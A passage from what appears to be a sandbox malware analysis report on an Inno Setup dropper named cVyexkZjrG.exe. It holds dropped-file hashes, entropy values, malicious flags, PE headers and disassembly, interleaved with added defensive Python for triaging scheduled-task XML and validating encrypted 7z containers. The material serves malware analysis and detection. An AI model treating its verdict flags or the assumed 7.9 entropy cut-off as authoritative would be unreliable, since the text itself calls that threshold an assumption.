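        findings.append(("incomplete", "no <Actions> element: definition is truncated or malformed"))
    return findings


def is_suspicious(xml_text):
    """True for a masquerading task, or one that is both persistent and elevated."""
    tags = {tag for tag, _ in triage_task_xml(xml_text)}
    return "masquerade" in tags or {"persistence", "privilege"} <= tags


if __name__ == "__main__":
    for tag, detail in triage_task_xml(SAMPLE_TASK_XML):
        print(f"[{tag}] {detail}")
    print("suspicious:", is_suspicious(SAMPLE_TASK_XML))
```

On a live host the same checks apply to the XML files under C:\Windows\System32\Tasks, which is where a registered task's definition is stored; the masquerade check is the cheapest one, since legitimate Microsoft tasks do not sit at the root of the task library.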
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):1741188
                          Entropy (8bit):7.9999001471583515
                          Encrypted:true
                          SSDEEP:49152:9aEhXvns3rFhdXUq1lMApKE59iYLfn1jtTO/W2Y7u4NC:bXvsbGqXMUKE59i2rSMu4NC
                          MD5:094C0AE003065FFA5629135986100DE9
                          SHA1:4E69EB9649E29070C6F9229663E20E6895EE3635
                          SHA-256:4E32486F96073839E9E674B2C372B58BC4244EAF45994E50D46BF94A3BF6B5ED
                          SHA-512:2C952EB9CFC46F4DF1A4F7E36B372C15B5361513805739E5424095C74AE6C4E1DFC0160505E1CBDFCDA73391E51ED40BC26E2BAE3E7C4CF87EA40DCF2C60F984
                          Malicious:false
                          Preview:.#........J..#..Q.JQ;...}....S..U?.S.Z.qcL.XY:#w..).R.I..Dx....r....2. .T.....iC.:.2..+^..t...tc.......8p&....|...y*c....M..q..e1Xk.4...x..F.n.F....e0....ow.......P.I@.r..'7..Fh%..E.b.....<...iw6Z.......YvY...~YT..`.2rgl.......2..7.,.guV..............c#2....W.Z.....E.$....j......m...d..#.Xq.-J..Q.v.{.q...J'G....#<(.cc=hA.2.6iy.-8N.....(.!..zd..YQ......j-^..e..*X!..5..f.M,..j..&G......q...*......3.#.xQ.3.(.{..2..n.....g../..T5q......f.........3My4......I.......2.......#k...yg.....).2y........:..)!9K..NB..?.&..b.k...N...xc.K..T....3.K.;.\...../(7.r....>.g.....w."...R..>.;8@:....0lK7>.&1p./.?b}.;._b..|[.TC...UO.W...br.Kp....6m.B...$NOL.......R7r..&/d..^.:......o.f...?@.@....t^e...@.4.I)...)-.y.K.Y....2..~...>..d.<.....n....\l|..H.d3t...L?"..l... ..>....wc....T.......L7.....j.......l...K......,yB ......N.......L_...Z.at..O</..X.~...E..y...q~G....1..=.rwR....Y.......(3m..>.R~F.U....J.w.....L.Jx|.b.....l.B.'A&....z.X..K.T.G...{9..i...e.
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):64
                          Entropy (8bit):1.1628158735648508
                          Encrypted:false
                          SSDEEP:3:NlllulFgtj:NllUa
                          MD5:E986DDCA20E18C878305AA21342325F6
                          SHA1:AE6890EE7BB81A051A4F4079F549DEBCCE0F82C9
                          SHA-256:9624DAA47DF80C2229877179550D8373CAEEEAE25A8123698D7A516AD455DD15
                          SHA-512:8B0CD5C1F0BAECA299669D6A0CB74F9315E90B05EDEA16C92B92D9927D3D07225AC5DAE9941CF339E1CED349BA8129F56F118CF89AB86CF8DAAAFFDB8EC8B56D
                          Malicious:false
                          Preview:@...e................................................@..........
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp
                          File Type:PE32+ executable (console) x86-64, for MS Windows
                          Category:dropped
                          Size (bytes):6144
                          Entropy (8bit):4.720366600008286
                          Encrypted:false
                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                          MD5:E4211D6D009757C078A9FAC7FF4F03D4
                          SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                          SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                          SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                          Malicious:false
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 0%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3606528
                          Entropy (8bit):7.005604268954487
                          Encrypted:false
                          SSDEEP:98304:yLVLAJG42oakQdhme71MzSRTP/Se7NHaV:yZyTFaOe71MzSP/Se75g
                          MD5:1047AF726D2E233D71934EF55E635C4A
                          SHA1:AB12E827E4E57DEA2E885733F0C48E9A83756678
                          SHA-256:42934349F3C8D0EE1CD121B8386A5A6D28D7E8E54A251AE18AA0992D5897EC44
                          SHA-512:8A26268641B1B3F54ABE04CA2212FCA8BCCBD575DCDAB38F7E921FE9E01C29B99BCE25913642E658027A47E27AED795DD5FF3EF9DDC1077108BE29210052AF7E
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 16%
                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%.........................................7...........@.........................HC.......J..<....07.X....................@7.$?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................8Tk....p.....(......"(............. ..`.rsrc...X....07.......6.............@..@.reloc..$?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\Desktop\cVyexkZjrG.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3366912
                          Entropy (8bit):6.530564756542746
                          Encrypted:false
                          SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                          MD5:0195248B8EBF37D072592944E7488FC4
                          SHA1:9B440D54D0F9033ED9B4F153521EBE557B09E9A2
                          SHA-256:CBD84C67DBC982E19F49D77A9FB61D81ED3E3873A858BA88C8916D9513602483
                          SHA-512:5DD4297E8A7473B176108737EAF89F4514F15FFBDC57DBA33748012DD07971CBAEC9EC53C036A2681999A262FB43E8847CB5BF0DB5825B9FB4FB326F4ED7D596
                          Malicious:true
                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                          Process:C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp
                          File Type:PE32+ executable (console) x86-64, for MS Windows
                          Category:dropped
                          Size (bytes):6144
                          Entropy (8bit):4.720366600008286
                          Encrypted:false
                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                          MD5:E4211D6D009757C078A9FAC7FF4F03D4
                          SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                          SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                          SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                          Malicious:false
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 0%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3606528
                          Entropy (8bit):7.005604268954487
                          Encrypted:false
                          SSDEEP:98304:yLVLAJG42oakQdhme71MzSRTP/Se7NHaV:yZyTFaOe71MzSP/Se75g
                          MD5:1047AF726D2E233D71934EF55E635C4A
                          SHA1:AB12E827E4E57DEA2E885733F0C48E9A83756678
                          SHA-256:42934349F3C8D0EE1CD121B8386A5A6D28D7E8E54A251AE18AA0992D5897EC44
                          SHA-512:8A26268641B1B3F54ABE04CA2212FCA8BCCBD575DCDAB38F7E921FE9E01C29B99BCE25913642E658027A47E27AED795DD5FF3EF9DDC1077108BE29210052AF7E
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 16%
                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%.........................................7...........@.........................HC.......J..<....07.X....................@7.$?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................8Tk....p.....(......"(............. ..`.rsrc...X....07.......6.............@..@.reloc..$?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\Desktop\cVyexkZjrG.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3366912
                          Entropy (8bit):6.530564756542746
                          Encrypted:false
                          SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                          MD5:0195248B8EBF37D072592944E7488FC4
                          SHA1:9B440D54D0F9033ED9B4F153521EBE557B09E9A2
                          SHA-256:CBD84C67DBC982E19F49D77A9FB61D81ED3E3873A858BA88C8916D9513602483
                          SHA-512:5DD4297E8A7473B176108737EAF89F4514F15FFBDC57DBA33748012DD07971CBAEC9EC53C036A2681999A262FB43E8847CB5BF0DB5825B9FB4FB326F4ED7D596
                          Malicious:true
                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:ASCII text, with CRLF, CR line terminators
                          Category:dropped
                          Size (bytes):406
                          Entropy (8bit):5.117520345541057
                          Encrypted:false
                          SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                          MD5:9200058492BCA8F9D88B4877F842C148
                          SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                          SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                          SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                          Malicious:false
                          Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
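The 7-Zip log above shows the dropped 7zr.exe unpacking locale3.dat (a 7z container using LZMA2, BCJ2 and 7zAES) into a 63640-byte file, which is the size of the PE32+ native driver listed earlier as dropped by 7zr.exe. Every 7z container, password-protected or not, begins with a 32-byte plaintext start header that can be validated without the password, and in the entries above the "Encrypted" flag is true only for the files whose 8-bit entropy is near 8.0. The following Python is an added example for this page, not 7-Zip's code or anything from the report: it checks the start-header CRC, locates the next header, and computes the same entropy measure. The sample container and its filler bytes are constructed here, and the 7.9 bits/byte cut-off is an assumption, not a documented Joe Sandbox threshold.

```python
import hashlib
import math
import struct
import zlib
from collections import Counter

SEVENZ_MAGIC = b"7z\xbc\xaf\x27\x1c"   # 37 7A BC AF 27 1C


def shannon_entropy(data):
    """8-bit Shannon entropy in bits per byte (0.0 for empty input, at most 8.0)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_7z_start_header(data):
    """Fields of the 32-byte 7z start header, or None if the magic is absent.

    Layout (little endian): magic[6] major[1] minor[1] StartHeaderCRC[4]
    NextHeaderOffset[8] NextHeaderSize[8] NextHeaderCRC[4]. StartHeaderCRC is
    the CRC32 of the 20 bytes that follow it. The start header is plaintext
    even when 7zAES protects the packed streams and the next header.
    """
    if len(data) < 32 or data[:6] != SEVENZ_MAGIC:
        return None
    major, minor, start_crc = struct.unpack_from("<BBI", data, 6)
    next_off, next_size, next_crc = struct.unpack_from("<QQI", data, 12)
    begin, end = 32 + next_off, 32 + next_off + next_size  # next header lies after the start header
    in_bounds = end <= len(data)
    return {
        "version": f"{major}.{minor}",
        "start_header_crc_ok": zlib.crc32(data[12:32]) == start_crc,
        "next_header_offset": next_off,
        "next_header_size": next_size,
        "next_header_in_bounds": in_bounds,
        "next_header_crc_ok": in_bounds and zlib.crc32(data[begin:end]) == next_crc,
    }


def triage_blob(data, encrypted_threshold=7.9):
    """Summarise a dropped file the way the report's columns do.

    encrypted_threshold is an assumption: 7.9 bits/byte separates the 7.99
    entries above from the 7.0 and 6.5 ones.
    """
    ent = shannon_entropy(data)
    hdr = parse_7z_start_header(data)
    return {
        "size": len(data),
        "entropy": round(ent, 4),
        "encrypted": ent >= encrypted_threshold,
        "is_7z": hdr is not None,
        "start_header": hdr,
    }


def _pseudo_random_bytes(n, seed):
    """Deterministic high-entropy filler (SHA-256 chain) standing in for 7zAES output."""
    out, block = bytearray(), seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


def build_sample_7z(packed_size=32768, next_header_size=322):
    """Constructed 7z container: a valid start header over opaque packed streams
    and an opaque next header, which is what a 7zAES archive with an encrypted
    header looks like to a parser that does not have the password."""
    packed = _pseudo_random_bytes(packed_size, b"packed streams")
    next_header = _pseudo_random_bytes(next_header_size, b"encoded header")
    tail = struct.pack("<QQI", len(packed), len(next_header), zlib.crc32(next_header))
    start = SEVENZ_MAGIC + b"\x00\x04" + struct.pack("<I", zlib.crc32(tail)) + tail
    return start + packed + next_header


SAMPLE_7Z = build_sample_7z()
# A short ASCII line modelled on the PowerShell policy-test files listed above.
SAMPLE_TEXT = b"# PowerShell test file to determine AppLocker lockdown mode"

if __name__ == "__main__":
    for name, blob in (("locale.dat", SAMPLE_7Z), ("policy-test.ps1", SAMPLE_TEXT)):
        print(name, triage_blob(blob))
```

A start header whose CRC fails, or whose next header runs past the end of the file, is either a truncated copy or a blob that merely begins with the 7z magic, so the check belongs before any attempt to hand the file to 7-Zip; the entropy alone only says that the body is compressed or encrypted, not which.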
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.947667484457675
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 98.04%
                          • Inno Setup installer (109748/4) 1.08%
                          • InstallShield setup (43055/19) 0.42%
                          • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                          File name:cVyexkZjrG.exe
                          File size:7'370'578 bytes
                          MD5:4e1927f742599f95f0d9450b4b8c2c80
                          SHA1:4bd20ceb48adb224d11eae63ce6f27cb974e321b
                          SHA256:5a3c5aa184e4fdb2de4530c18adb9b12ffc1a101c86cde8de13ce49d7a7a2b44
                          SHA512:bcd48db8ad3717543fd8845af2bca36bfdc56e0f8a61a6cdfcd391120479451c6f13ddc3035f9117c804fece98291d34d332f26aad810b9c6ed5fa766e96f9b6
                          SSDEEP:196608:lzGMRNXJundeS47FJ9qQNWxCfzLZghnolTi:l7RhJ+deT7FL7aWLChnolm
                          TLSH:17762223F2CBD03DE05E4B3B19B2A15490FB6A21A923AD5796ECB4ACCF351501D3E647
                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                          Icon Hash:0c0c2d33ceec80aa
                          Entrypoint:0x4a83bc
                          Entrypoint Section:.itext
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:6
                          OS Version Minor:1
                          File Version Major:6
                          File Version Minor:1
                          Subsystem Version Major:6
                          Subsystem Version Minor:1
                          Import Hash:40ab50289f7ef5fae60801f88d4541fc
                          Instruction
                          push ebp
                          mov ebp, esp
                          add esp, FFFFFFA4h
                          push ebx
                          push esi
                          push edi
                          xor eax, eax
                          mov dword ptr [ebp-3Ch], eax
                          mov dword ptr [ebp-40h], eax
                          mov dword ptr [ebp-5Ch], eax
                          mov dword ptr [ebp-30h], eax
                          mov dword ptr [ebp-38h], eax
                          mov dword ptr [ebp-34h], eax
                          mov dword ptr [ebp-2Ch], eax
                          mov dword ptr [ebp-28h], eax
                          mov dword ptr [ebp-14h], eax
                          mov eax, 004A2EBCh
                          call 00007F1750A6FCE5h
                          xor eax, eax
                          push ebp
                          push 004A8AC1h
                          push dword ptr fs:[eax]
                          mov dword ptr fs:[eax], esp
                          xor edx, edx
                          push ebp
                          push 004A8A7Bh
                          push dword ptr fs:[edx]
                          mov dword ptr fs:[edx], esp
                          mov eax, dword ptr [004B0634h]
                          call 00007F1750B0166Bh
                          call 00007F1750B011BEh
                          lea edx, dword ptr [ebp-14h]
                          xor eax, eax
                          call 00007F1750AFBE98h
                          mov edx, dword ptr [ebp-14h]
                          mov eax, 004B41F4h
                          call 00007F1750A69D93h
                          push 00000002h
                          push 00000000h
                          push 00000001h
                          mov ecx, dword ptr [004B41F4h]
                          mov dl, 01h
                          mov eax, dword ptr [0049CD14h]
                          call 00007F1750AFD1C3h
                          mov dword ptr [004B41F8h], eax
                          xor edx, edx
                          push ebp
                          push 004A8A27h
                          push dword ptr fs:[edx]
                          mov dword ptr fs:[edx], esp
                          call 00007F1750B016F3h
                          mov dword ptr [004B4200h], eax
                          mov eax, dword ptr [004B4200h]
                          cmp dword ptr [eax+0Ch], 01h
                          jne 00007F1750B083DAh
                          mov eax, dword ptr [004B4200h]
                          mov edx, 00000028h
                          call 00007F1750AFDAB8h
                          mov edx, dword ptr [004B4200h]
                          Name | Virtual Address | Virtual Size | Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0xb7000 | 0x71 | .edata
                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb5000 | 0xfec | .idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xcb000 | 0x11000 | .rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xba000 | 0x10fa8 | .reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
                          IMAGE_DIRECTORY_ENTRY_TLS | 0xb9000 | 0x18 | .rdata
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
                          IMAGE_DIRECTORY_ENTRY_IAT | 0xb52d4 | 0x25c | .idata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0xb6000 | 0x1a4 | .didata
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
                          Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                          .text | 0x1000 | 0xa568c | 0xa5800 | b889d302f6fc48a904de33d8d947ae80 | False | 0.3620185045317221 | data | 6.377190161826806 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .itext | 0xa7000 | 0x1b64 | 0x1c00 | 588dd0a8ab499300d3701cbd11b017d9 | False | 0.548828125 | data | 6.109264411030635 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .data | 0xa9000 | 0x3838 | 0x3a00 | 5c0c76e77aef52ebc6702430837ccb6e | False | 0.35338092672413796 | data | 4.95916338709992 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .bss | 0xad000 | 0x7258 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .idata | 0xb5000 | 0xfec | 0x1000 | 627340dff539ef99048969aa4824fb2d | False | 0.380615234375 | data | 5.020404933181373 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .didata | 0xb6000 | 0x1a4 | 0x200 | fd11c1109737963cc6cb7258063abfd6 | False | 0.34765625 | data | 2.729290535217263 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .edata | 0xb7000 | 0x71 | 0x200 | 7de8ca0c7a61668a728fd3a88dc0942d | False | 0.1796875 | data | 1.305578535725827 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .tls | 0xb8000 | 0x18 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rdata | 0xb9000 | 0x5d | 0x200 | d84006640084dc9f74a07c2ff9c7d656 | False | 0.189453125 | data | 1.3892750148744617 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc | 0xba000 | 0x10fa8 | 0x11000 | a85fda2741bd9417695daa5fc5a9d7a5 | False | 0.5789579503676471 | data | 6.709466460182023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          .rsrc | 0xcb000 | 0x11000 | 0x11000 | c7a4821d78da65e97b874b4ac988cfcd | False | 0.18775850183823528 | data | 3.7235953212868016 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                          RT_ICON | 0xcb678 | 0xa68 | Device independent bitmap graphic, 64 x 128 x 4, image size 2048 | English | United States | 0.1174924924924925
                          RT_ICON | 0xcc0e0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.15792682926829268
                          RT_ICON | 0xcc748 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.23387096774193547
                          RT_ICON | 0xcca30 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.39864864864864863
                          RT_ICON | 0xccb58 | 0x1628 | Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors | English | United States | 0.08339210155148095
                          RT_ICON | 0xce180 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.1023454157782516
                          RT_ICON | 0xcf028 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.10649819494584838
                          RT_ICON | 0xcf8d0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.10838150289017341
                          RT_ICON | 0xcfe38 | 0x12e5 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.8712011577424024
                          RT_ICON | 0xd1120 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.05668398677373642
                          RT_ICON | 0xd5348 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.08475103734439834
                          RT_ICON | 0xd78f0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.09920262664165103
                          RT_ICON | 0xd8998 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.2047872340425532
                          RT_STRING | 0xd8e00 | 0x3f8 | data | - | - | 0.3198818897637795
                          RT_STRING | 0xd91f8 | 0x2dc | data | - | - | 0.36475409836065575
                          RT_STRING | 0xd94d4 | 0x430 | data | - | - | 0.40578358208955223
                          RT_STRING | 0xd9904 | 0x44c | data | - | - | 0.38636363636363635
                          RT_STRING | 0xd9d50 | 0x2d4 | data | - | - | 0.39226519337016574
                          RT_STRING | 0xda024 | 0xb8 | data | - | - | 0.6467391304347826
                          RT_STRING | 0xda0dc | 0x9c | data | - | - | 0.6410256410256411
                          RT_STRING | 0xda178 | 0x374 | data | - | - | 0.4230769230769231
